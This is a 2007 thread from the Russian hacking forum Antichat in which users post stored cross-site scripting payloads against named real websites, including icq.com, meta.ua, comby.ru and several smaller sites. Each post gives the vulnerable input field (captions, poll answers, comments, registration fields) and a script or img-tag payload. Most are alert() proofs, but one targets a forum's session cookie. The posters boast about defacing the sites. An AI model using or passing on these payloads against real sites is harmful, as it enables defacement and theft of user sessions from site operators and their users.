ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Активные Xss (https://forum.antichat.xyz/showthread.php?t=35802)

freddi 02.04.2007 21:55

splashblog.com

Блоггер фоток. Заливаем новую фотку. Уязвимо поле "Caption:"

Код:

"><script>alert();</script>
Работает в ие и опере.

n1†R0x 03.04.2007 18:18

http://rock-rus.com.ru/users.php

в регистрации пишем мыло
Код:

blblbl@hek.cc"><script>alert('alert')</script>

freddi 04.04.2007 22:07

icq.com

Заходим на форумы или в группы, создаем голосование. Уязвимы поля "Answer..."
Код:

<script>alert(1);</script>
Получилось голосование и теперь, когда кто-либо будет голосовать за пункт с алертом - то будут выскакивать все алерты (дапустим вы поставили алерты на все ансверы)))

Работает в ие и опере.

freddi 05.04.2007 23:13

meta.ua

Идем в блог, создаем комментарий
Код:

<script>alert(10);</script>
и при ответе на этот коментарий вылезает алерт.

Работает в ие и опере.

freddi 05.04.2007 23:22

comby.ru


Везде где можно оставить комментарий:
Код:

<img src=javascript:alert()>
вылезет алерт.

Работает в ие и опере.

o3,14um 06.04.2007 15:49

http://planeta.solo.by/- геймерский сайт провайдера.

В личку написать:

<img src=fuck onerror=alert(\'xss\')

Horsekiller 07.04.2007 11:01

tForum <= b0.915
Форум малораспространённый, но всё же.

Активная XSS в поле "Message".

Код:

http://www.target/path/message.php
Вставляем в поле "Message":

Код:

[img]javascript:alert(document.cookie)[/img]
В кукисах сессия, логин.

Isis 08.04.2007 11:36

Отморозки
http://www.otmorozki.org/images/login_d.gif
=============
Otmorozki.org
=============
Заходим в любую новость пишем комментарий...
Уязвимое поле "тема" ..вот там и пишем наш кодик..
Код:

"><script>alert("Отморозки вас похекале")</script>
Теперь ваша уязвимость ( xss ) будет гулять везде))Даже на главной странице

[loy] 08.04.2007 11:39

жесть,зачод

Isis 08.04.2007 11:51

Warcraft
http://games.mipt.ru/wc3/images/miptlogo.png
=============
Games.mipt.ru/wc3/
=============

Уязвимые поля при регистрации:
"Полное имя"
"О пользователе"
"Дом.страница"

Вставляем туда код
Код:

"><script>alert("Mipt \nВас похекале....\nУязвимость на вашем сайте нашел я, Isis \nРеспект всему античату \nА также отдельный респект:\n gemaglabin\n Great\n blackybr\n ettee\n and etc..... Гыгы \n Короче вас похекале :))) ")</script>
И вот пример.....просмотр моего профиля
Isis


Время: 19:34